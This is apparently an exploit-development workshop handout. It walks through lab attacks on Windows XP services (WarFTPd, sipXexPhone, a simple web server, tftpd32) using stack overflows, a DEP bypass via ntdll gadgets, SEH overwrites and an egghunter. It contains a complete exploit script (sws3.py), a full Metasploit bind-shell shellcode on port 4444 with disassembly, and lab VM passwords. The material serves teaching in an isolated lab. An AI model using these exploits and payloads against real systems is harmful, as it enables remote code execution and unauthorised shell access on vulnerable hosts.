Exploit Dev
iscomsa
Mar 28th, 2016
You can download the Exploit Dev VMs from the links below:
https://s3.amazonaws.com/StrategicSec-VMs/XPSP3-ED-Target.zip
https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-XP-ED-Attack-Host.zip
user: Administrator
pass: strategicsec

https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-ED-MSF.zip
user: strategicsec
pass: strategicsec


cd /home/strategicsec/toolz/metasploit
mkdir DLLs
cd DLLs
wget https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/DLLs.zip
unzip DLLs.zip

###########################
# Lab 1a: Stack Overflows #
###########################

#################################
# Start WarFTPd                 #
# Start WinDBG                  #
# Press F6                      #
# Attach to war-ftpd.exe        #
#################################
Inside of your XP-ED-AttackHost VM please download this file and extract it to your Desktop:
https://s3.amazonaws.com/StrategicSec-Files/ED-Workshop-Files.zip


cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a


python warftpd1.py | nc XPSP3-ED-Target-IP 21

At the WinDbg prompt:
"r" to show registers (or Alt+4)

dd esp


python warftpd2.py | nc XPSP3-ED-Target-IP 21

At the WinDbg prompt:
"r" to show registers (or Alt+4)
dd esp

EIP: 32714131
ESP: affd58 (71413471)

Now we need to SSH into the StrategicSec Ubuntu host

cd /home/strategicsec/toolz/metasploit/tools

ruby pattern_offset.rb 32714131
485

ruby pattern_offset.rb 71413471
493

Distance to EIP is: 485
Relative position of ESP is: 493

RET – POP EIP
RET 4 – POP EIP, then add 4 to ESP (the four bytes after the return address are skipped, which is why ESP sits 8 bytes past the EIP overwrite above)

cd /home/strategicsec/toolz/metasploit/
./msfpescan -j ESP DLLs/xpsp3/shell32.dll

0x7c9c167d push esp; retn 0x304d
0x7c9d30d7 jmp esp   <-- how about we use this one
0x7c9d30eb jmp esp
0x7c9d30ff jmp esp


Open warftpd3.py in Notepad++ and fill in the appropriate values:
- Distance to EIP
- Address of JMP ESP


python warftpd3.py | nc XPSP3-ED-Target-IP 21

0:003> dd eip
0:003> dd esp


Mention bad characters
No debugger


python warftpd4.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444



###########################################
# Lab 1b: Stack Overflows with DEP Bypass #
###########################################

Reboot your target host and choose the "2nd" option for DEP.


cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b


python warftpd1.py | nc XPSP3-ED-Target-IP 21

At the WinDbg prompt:
"r" to show registers (or Alt+4)

dd esp


python warftpd2.py | nc XPSP3-ED-Target-IP 21

At the WinDbg prompt:
"r" to show registers (or Alt+4)
dd esp

EIP: 32714131
ESP: affd58 (71413471)

Now we need to SSH into the StrategicSec Ubuntu host

cd /home/strategicsec/toolz/metasploit/tools

ruby pattern_offset.rb 32714131
485

ruby pattern_offset.rb 71413471
493

cd /home/strategicsec/toolz/metasploit/

./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7


python warftpd3.py | nc XPSP3-ED-Target-IP 21

0:003> dd eip
0:003> dd esp

INT3s - GOOD!!!!!!!


python warftpd4.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444


strategicsec....exploit no workie!!!!

Why????????? DEP!!!!!!!!!!!!!


Let's look through ole32.dll for the following instructions:

mov al,0x1
ret 0x4

We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.


./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll

[DLLs/xpsp3/ole32.dll]
0x775ee00e b001c204
0x775ee00e mov al, 1
0x775ee010 ret 4


Then we need to jump to the LdrpCheckNXCompatibility routine in ntdll.dll that disables DEP.


Inside of ntdll.dll we need to find the following instructions:

CMP AL,1
PUSH 2
POP ESI
JE ntdll.7


./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll

[DLLs/xpsp3/ntdll.dll]
0x7c91cd24 3c016a025e0f84
0x7c91cd24 cmp al, 1
0x7c91cd26 push 2
0x7c91cd28 pop esi
0x7c91cd29 jz 7


This set of instructions makes sure that AL is set to 1, then 2 is pushed on the stack and popped into ESI.


dep = "\x0e\xe0\x5e\x77" + \   # 0x775ee00e: mov al,1 ; ret 4 (ole32.dll)
      "\xff\xff\xff\xff" + \   # the 4 bytes that "ret 4" discards
      "\x24\xcd\x91\x7c" + \   # 0x7c91cd24: cmp al,1 ... inside LdrpCheckNXCompatibility (ntdll.dll)
      "\xff\xff\xff\xff" + \
      "A"*0x54


#################################
# Start WarFTPd                 #
# Start WinDBG                  #
# Press F6                      #
# Attach to war-ftpd.exe        #
# bp 0x775ee00e                 #
# g                             #
#################################


python warftpd5.py | nc XPSP3-ED-Target-IP 21

---------------------------------------------------------------------------
We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.

mov al,0x1
ret 0x4


0:005> g
Breakpoint 0 hit
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=775ee00e esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
ole32!CSSMappedStream::IsWriteable:
775ee00e b001 mov al,1


0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=775ee010 esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
ole32!CSSMappedStream::IsWriteable+0x2:
775ee010 c20400 ret 4


---------------------------------------------------------------------------
Ok, so inside of ntdll.dll we need to find the following instructions:

CMP AL,1
PUSH 2
POP ESI
JE ntdll.7

0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=7c91cd24 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
ntdll!LdrpCheckNXCompatibility+0x13:
7c91cd24 3c01 cmp al,1


0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=7c91cd26 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!LdrpCheckNXCompatibility+0x15:
7c91cd26 6a02 push 2


0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=7c91cd28 esp=00affd5c ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!LdrpCheckNXCompatibility+0x17:
7c91cd28 5e pop esi


0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=00000002 edi=00affe58
eip=7c91cd29 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!LdrpCheckNXCompatibility+0x18:
7c91cd29 0f84df290200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93f70e) [br=1]


---------------------------------------------------------------------------


python warftpd5.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444


##########################
# Lab 1c: SEH Overwrites #
##########################

#################################################
# On our VictimXP Host (XPSP3-ED-Target-IP)     #
# Start sipXexPhone if it isn't already running #
# Start WinDBG                                  #
# Press "F6" and Attach to sipXexPhone.exe      #
# Press "F5" to start the debugger              #
#################################################


cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1c\sipx_complete


python sipex0.py XPSP3-ED-Target-IP

0:003> !exchain
0:003> dds esp
0:003> dds

python sipex1.py XPSP3-ED-Target-IP

0:003> !exchain
0:003> g

When looking at !exchain you should see that EIP is 41414141, so let's add more characters.


python sipex2.py XPSP3-ED-Target-IP

0:003> !exchain
0:003> g


***ssh into instructor Ubuntu host***
cd /home/strategicsec/toolz/metasploit/tools
ruby pattern_offset.rb 41346941 <------- We should see that SEH is at 252


In WinDbg, list the loaded modules and their protections:
!load narly
!nmod

***ssh into instructor Ubuntu host***
ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
cd /home/strategicsec/toolz/metasploit/
./msfpescan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
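The protection summary that narly's !nmod lists per module comes from the PE headers of each DLL, and it is worth knowing how to read it without the debugger. The following is an added Python 3 example, not part of the lab files: it parses the DllCharacteristics field of a PE image and reports whether the module was linked with NX_COMPAT (DEP), DYNAMIC_BASE (ASLR) and NO_SEH. SafeSEH needs the load configuration directory as well and is deliberately left out. Because the lab DLLs are not reproduced here, the input is a minimal constructed PE header built by build_sample_pe; all function names are my own.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* flags from the PE/COFF specification
DYNAMIC_BASE = 0x0040    # image can be relocated at load time (ASLR)
NX_COMPAT = 0x0100       # image is compatible with DEP
NO_SEH = 0x0400          # image declares that it uses no SEH handlers
IMAGE_FILE_DLL = 0x2000  # COFF Characteristics bit: the image is a DLL


def pe_mitigations(data):
    """Parse the headers of a PE image (bytes) and report linker-time mitigation flags."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (machine, nsections, _ts, _symptr, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header for both PE32 and PE32+
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "pe32plus": magic == 0x20B,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "dep": bool(dll_chars & NX_COMPAT),
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "no_seh": bool(dll_chars & NO_SEH),
        "dll_characteristics": dll_chars,
    }


def narly_style_line(name, data):
    """One line in the spirit of !nmod: module name followed by the protections it has."""
    m = pe_mitigations(data)
    flags = [k.upper() for k in ("dep", "aslr", "no_seh") if m[k]]
    return "%-16s %s" % (name, " ".join(flags) if flags else "(no mitigations)")


def build_sample_pe(dll_characteristics, pe32plus=False):
    """Constructed minimal PE header (DOS header + PE signature + COFF + optional header).

    Enough for the header parser above; it is not a loadable image.
    """
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)   # e_lfanew: PE header right after the DOS header
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0,
                       opt_size, IMAGE_FILE_DLL | 0x0002)  # 0x0002: EXECUTABLE_IMAGE
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    legacy = build_sample_pe(0)   # like a third-party DLL built without /NXCOMPAT or /DYNAMICBASE
    hardened = build_sample_pe(NX_COMPAT | DYNAMIC_BASE)
    print(narly_style_line("legacy.dll", legacy))
    print(narly_style_line("hardened.dll", hardened))
```

A module that prints "(no mitigations)" is exactly the kind narly flags and msfpescan -p is then pointed at; on a real system you would read the file from disk and pass its bytes to pe_mitigations.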


#########################################
# sipex3.py in Notepad++.               #
# Set cseq = 252                        #
# Set seh2 address to: 0x10015977       #
#########################################


python sipex3.py XPSP3-ED-Target-IP
0:003> !exchain

python sipex4.py XPSP3-ED-Target-IP

nc XPSP3-ED-Target-IP 4444


Brush up on the basics of Structured Exception Handlers:
http://www.securitytube.net/video/1406
http://www.securitytube.net/video/1407
http://www.securitytube.net/video/1408


Here are the slides for the exploit dev basics:
https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+1+-+Getting+Started.pptx
https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+2+-+The+Process.pptx
https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+4+-+Windows+Stack+Overflows.pptx


Here are the exploit dev basic videos:
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-01+20.21+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-03+19.11+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-08+19.10+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-10+19.03+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-17+19.13+Exploit+Dev+Night+School+October+2013.wmv


########################################
# Lab 2a: Not Enough Space (Egghunter) #
########################################

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton

SWS - SIMPLE WEB SERVER
-----------------------

Running SWS on Strategicsec-XP-ED-Target-VM
Start > Programs > Simple Web Server (it's in the middle somewhere)
Red icon in system tray
Double click it
- it will pop up a menu
- select "start"
- dialog box shows starting params - port 82

WinDBG
- attach to "server.exe"


python sws1.py | nc XPSP3-ED-Target-IP 82


python sws2.py | nc XPSP3-ED-Target-IP 82


SSH into the Ubuntu host (user: strategicsec / pass: strategicsec)
cd /home/strategicsec/toolz/metasploit/tools
ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
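The lookup that pattern_offset.rb performs for each of these labs, as an added Python 3 example that is not part of the lab files: it regenerates the Metasploit cyclic pattern (upper, lower, digit triplets, period 20280) and reports where the little-endian bytes of a crashed register's value occur in it. The register values are the ones shown in the labs (0x32714131 and 0x71413471 from Lab 1a/1b, 0x41346941 from Lab 1c, 0x41356841 and 0x68413668 here); the function names are my own.

```python
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1Aa2...Aa9Ab0Ab1... (period 20280 bytes).

    Every 4-byte window is unique within one period, which is what lets a register
    value be mapped back to a single offset in the buffer that was sent.
    """
    period = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGITS)
    repeats = length // len(period) + 1
    return (period * repeats)[:length]


def pattern_offset(value, length=20280):
    """Offset in the pattern of a value read from a crash dump.

    `value` is either the dword WinDbg showed (e.g. 0x32714131, treated as
    little-endian) or the literal 4-character string. Returns -1 if not found,
    which usually means the register was not overwritten by the pattern at all.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    else:
        needle = value
    return pattern_create(length).find(needle)


def crash_summary(eip_value, esp_value, length=20280):
    """The two numbers the lab derives: distance to EIP and relative position of ESP."""
    eip_off = pattern_offset(eip_value, length)
    esp_off = pattern_offset(esp_value, length)
    return {
        "distance_to_eip": eip_off,
        "esp_position": esp_off,
        "esp_after_eip": esp_off - eip_off,   # 8 for WarFTPd: 4 for the popped return address plus the 4 of a "ret 4"
    }


if __name__ == "__main__":
    # Values from the WinDbg register dumps in Lab 1a/1b, Lab 1c and Lab 2a
    print(crash_summary(0x32714131, 0x71413471))   # {'distance_to_eip': 485, 'esp_position': 493, 'esp_after_eip': 8}
    print(pattern_offset(0x41346941))              # 252, the SEH offset from Lab 1c
    print(crash_summary(0x41356841, 0x68413668))   # 225 / 229 for SWS
```

Send pattern_create(n) where the lab scripts send "A" * n, read the register back from the debugger, and feed it to pattern_offset; if the pattern you sent was longer than one period, pass that length so the search covers the repeated part too.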


EGGHUNTER:
----------

"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
         ^^^^^^^^^^^^^^^^
         ABBA (the egg tag the hunter searches for)

GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
                                   ^ JMP ESP
User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)



-----sws3.py-----
#!/usr/bin/python2

import os # for output setting
import sys
import struct # for pack function

# turn off output buffer and set binary mode
sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)


pad = "A" * 225 # distance to EIP
eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll

egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

shellcode = "\xCC" * 700 # placeholder payload: INT3s, so the debugger breaks when the egg is found

buf = "GET /"
buf += pad + struct.pack('<I', eip) + egghunter
buf += " HTTP/1.0\r\n"
buf += "User-Agent: ABBAABBA" # the egg: doubled tag, followed by the real payload
buf += shellcode
buf += " HTTP/1.0\r\n"

sys.stdout.write(buf)
-----
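How the 32-byte egghunter above actually finds the egg, as an added Python 3 emulation that is not part of the lab files. The real code walks memory one byte at a time; before touching each address it asks the kernel through a cheap system call (int 0x2e with eax = 2) whether the address is readable, so it never faults; when the answer is STATUS_ACCESS_VIOLATION (cmp al,5) it hops to the next 4 KiB page (or dx,0xfff ; inc edx); and when two consecutive scasd find the doubled tag (mov eax,0x41424241) it jumps to the byte right after it (jmp edi). The address space here is a constructed sparse dict of pages, the tag placement is made up, and the readability check is simplified to "all 8 bytes are mapped"; the function names are mine.

```python
PAGE = 0x1000
EGG = b"ABBA"   # mov eax,0x41424241 -> the bytes 41 42 42 41 in memory, i.e. "ABBA"


def build_memory():
    """Constructed sparse address space: {page base: bytearray(PAGE)}. Absent pages are unmapped."""
    mem = {0x00010000: bytearray(PAGE), 0x00011000: bytearray(PAGE), 0x00400000: bytearray(PAGE)}
    mem[0x00010000][0x200:0x204] = EGG                  # decoy: a single tag must NOT match
    payload = EGG + EGG + b"\xcc" * 16                  # the egg: doubled tag, then the code to run
    mem[0x00400000][0x123:0x123 + len(payload)] = payload
    return mem


def read(mem, addr, n):
    """Bytes at addr..addr+n, or None if any of them lies in an unmapped page."""
    out = bytearray()
    for a in range(addr, addr + n):
        page = mem.get(a & ~(PAGE - 1))
        if page is None:
            return None
        out.append(page[a & (PAGE - 1)])
    return bytes(out)


def probe(mem, addr):
    """Stand-in for the system call: True if the 8 bytes the two scasd will read are accessible."""
    return read(mem, addr, 8) is not None


def egghunt(mem, start=0, limit=0x7FFFFFFF):
    """Emulate the egghunter loop. Returns (address just past the doubled tag, stats)."""
    stats = {"syscalls": 0, "pages_skipped": 0}
    edx = (start | 0xFFF) + 1                  # or dx,0xfff ; inc edx -> start of the next page
    while edx < limit:
        stats["syscalls"] += 1                 # push edx ; push 2 ; pop eax ; int 0x2e
        if not probe(mem, edx):                # cmp al,5 ; je -> whole page is skipped
            stats["pages_skipped"] += 1
            edx = (edx | 0xFFF) + 1
            continue
        # mov eax,0x41424241 ; mov edi,edx ; scasd ; jne ; scasd ; jne
        if read(mem, edx, 4) == EGG and read(mem, edx + 4, 4) == EGG:
            return edx + 8, stats              # jmp edi: edi now points just past the tag
        edx += 1                               # inc edx: next byte of the same page
    return None, stats


if __name__ == "__main__":
    mem = build_memory()
    found, stats = egghunt(mem)
    print(hex(found), stats)   # 0x40012b, one probe per unmapped page but one per byte of mapped memory
```

The stats make the cost model visible: unmapped regions cost one system call per page, mapped regions one per byte, which is why the hunter is slow but safe, and why the egg has to be doubled (a lone "ABBA" in an unrelated buffer, like the decoy above, must not be taken for the payload).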

############################################
# Lab 2b: Not Enough Space (Negative Jump) #
############################################

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton


[pad = distance_to_seh - len(shellcode)] [shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]

1. overflow the buffer: pad + shellcode + jmp4 + eip + jmp_min, so that jmp4 lands in the next-SEH slot and eip in the handler slot
2. jump over the SEH record: jmp4 (two NOPs and a 4-byte short jump) hops over the handler address (eip)
3. POP 2 words off the stack: the handler address points at a POP POP RET, which returns into jmp4
4. negative jump into the NOPs, then into the shellcode: jmp_min is a 5-byte JMP backwards into the padding, which slides into the shellcode


#########################################
# Lab 2c: Not Enough Space (Trampoline) #
#########################################

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
On the Strategicsec-XP-ED-Target-VM VM

- open a command prompt
- cd c:\software\tftpd32
- run tftpd32.exe
- UDP port 69
(socket code is already in the scripts)


On your attack host please install:

NASM - Netwide Assembler


-----------------------------------------------------------------------------------------------------------------


We want to generate the shellcode (BIND SHELL on Port 4444)
- No restricted characters
- Encoder: NONE

Create a Python file called dumpshellcode.py

---
#!/usr/bin/python2

import os
import sys
import struct

# binary mode, unbuffered: otherwise Windows text mode would rewrite 0x0a bytes
sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)

# win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"

sys.stdout.write(shellcode)
---


python dumpshellcode.py > bindshell.bin

copy bindshell.bin into the "c:\Program Files\nasm" directory


Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin (317 bytes):
317 bindshell.bin

C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
00000000  FC            cld
00000001  6AEB          push byte -0x15
00000003  4D            dec ebp
00000004  E8F9FFFFFF    call dword 0x2
00000009  60            pushad
0000000A  8B6C2424      mov ebp,[esp+0x24]
0000000E  8B453C        mov eax,[ebp+0x3c]
00000011  8B7C0578      mov edi,[ebp+eax+0x78]
00000015  01EF          add edi,ebp
00000017  8B4F18        mov ecx,[edi+0x18]
0000001A  8B5F20        mov ebx,[edi+0x20]
0000001D  01EB          add ebx,ebp
0000001F  49            dec ecx
00000020  8B348B        mov esi,[ebx+ecx*4]
00000023  01EE          add esi,ebp
00000025  31C0          xor eax,eax
00000027  99            cdq
00000028  AC            lodsb
00000029  84C0          test al,al
0000002B  7407          jz 0x34
0000002D  C1CA0D        ror edx,0xd
00000030  01C2          add edx,eax
00000032  EBF4          jmp short 0x28
00000034  3B542428      cmp edx,[esp+0x28]
00000038  75E5          jnz 0x1f
0000003A  8B5F24        mov ebx,[edi+0x24]
0000003D  01EB          add ebx,ebp
0000003F  668B0C4B      mov cx,[ebx+ecx*2]
00000043  8B5F1C        mov ebx,[edi+0x1c]
00000046  01EB          add ebx,ebp
00000048  032C8B        add ebp,[ebx+ecx*4]
0000004B  896C241C      mov [esp+0x1c],ebp
0000004F  61            popad
00000050  C3            ret
00000051  31DB          xor ebx,ebx
00000053  648B4330      mov eax,[fs:ebx+0x30]
00000057  8B400C        mov eax,[eax+0xc]
0000005A  8B701C        mov esi,[eax+0x1c]
0000005D  AD            lodsd
0000005E  8B4008        mov eax,[eax+0x8]
00000061  5E            pop esi
00000062  688E4E0EEC    push dword 0xec0e4e8e
00000067  50            push eax
00000068  FFD6          call esi
0000006A  6653          push bx
0000006C  66683332      push word 0x3233
00000070  687773325F    push dword 0x5f327377
00000075  54            push esp
00000076  FFD0          call eax
00000078  68CBEDFC3B    push dword 0x3bfcedcb
0000007D  50            push eax
0000007E  FFD6          call esi                    PART 1
00000080  5F            pop edi
00000081  89E5          mov ebp,esp
00000083  6681ED0802    sub bp,0x208
00000088  55            push ebp
00000089  6A02          push byte +0x2
0000008B  FFD0          call eax
0000008D  68D909F5AD    push dword 0xadf509d9
00000092  57            push edi
00000093  FFD6          call esi
00000095  53            push ebx
00000096  53            push ebx
--------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
00000097  53            push ebx
00000098  53            push ebx
00000099  53            push ebx
0000009A  43            inc ebx
0000009B  53            push ebx
0000009C  43            inc ebx
0000009D  53            push ebx                    PART 2
0000009E  FFD0          call eax
000000A0  6668115C      push word 0x5c11
000000A4  6653          push bx
000000A6  89E1          mov ecx,esp
000000A8  95            xchg eax,ebp
000000A9  68A41A70C7    push dword 0xc7701aa4
000000AE  57            push edi
000000AF  FFD6          call esi
000000B1  6A10          push byte +0x10
000000B3  51            push ecx
000000B4  55            push ebp
000000B5  FFD0          call eax
000000B7  68A4AD2EE9    push dword 0xe92eada4
000000BC  57            push edi
000000BD  FFD6          call esi
000000BF  53            push ebx
000000C0  55            push ebp
000000C1  FFD0          call eax
000000C3  68E5498649    push dword 0x498649e5
000000C8  57            push edi
000000C9  FFD6          call esi
000000CB  50            push eax
000000CC  54            push esp
000000CD  54            push esp
000000CE  55            push ebp
000000CF  FFD0          call eax
000000D1  93            xchg eax,ebx
000000D2  68E779C679    push dword 0x79c679e7
000000D7  57            push edi
000000D8  FFD6          call esi
000000DA  55            push ebp
000000DB  FFD0          call eax
000000DD  666A64        push word 0x64
000000E0  6668636D      push word 0x6d63
000000E4  89E5          mov ebp,esp
000000E6  6A50          push byte +0x50
000000E8  59            pop ecx
000000E9  29CC          sub esp,ecx
000000EB  89E7          mov edi,esp
000000ED  6A44          push byte +0x44
000000EF  89E2          mov edx,esp
000000F1  31C0          xor eax,eax
000000F3  F3AA          rep stosb
000000F5  FE422D        inc byte [edx+0x2d]
000000F8  FE422C        inc byte [edx+0x2c]
000000FB  93            xchg eax,ebx
000000FC  8D7A38        lea edi,[edx+0x38]
000000FF  AB            stosd
00000100  AB            stosd
00000101  AB            stosd
00000102  6872FEB316    push dword 0x16b3fe72
00000107  FF7544        push dword [ebp+0x44]
0000010A  FFD6          call esi
0000010C  5B            pop ebx
0000010D  57            push edi
0000010E  52            push edx
0000010F  51            push ecx
00000110  51            push ecx
00000111  51            push ecx
00000112  6A01          push byte +0x1
00000114  51            push ecx
00000115  51            push ecx
00000116  55            push ebp
00000117  51            push ecx
00000118  FFD0          call eax
0000011A  68ADD905CE    push dword 0xce05d9ad
0000011F  53            push ebx
00000120  FFD6          call esi
00000122  6AFF          push byte -0x1
00000124  FF37          push dword [edi]
00000126  FFD0          call eax
00000128  8B57FC        mov edx,[edi-0x4]
0000012B  83C464        add esp,byte +0x64
0000012E  FFD6          call esi
00000130  52            push edx
00000131  FFD0          call eax
00000133  68F08A045F    push dword 0x5f048af0
00000138  53            push ebx
00000139  FFD6          call esi
0000013B  FFD0          call eax


part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
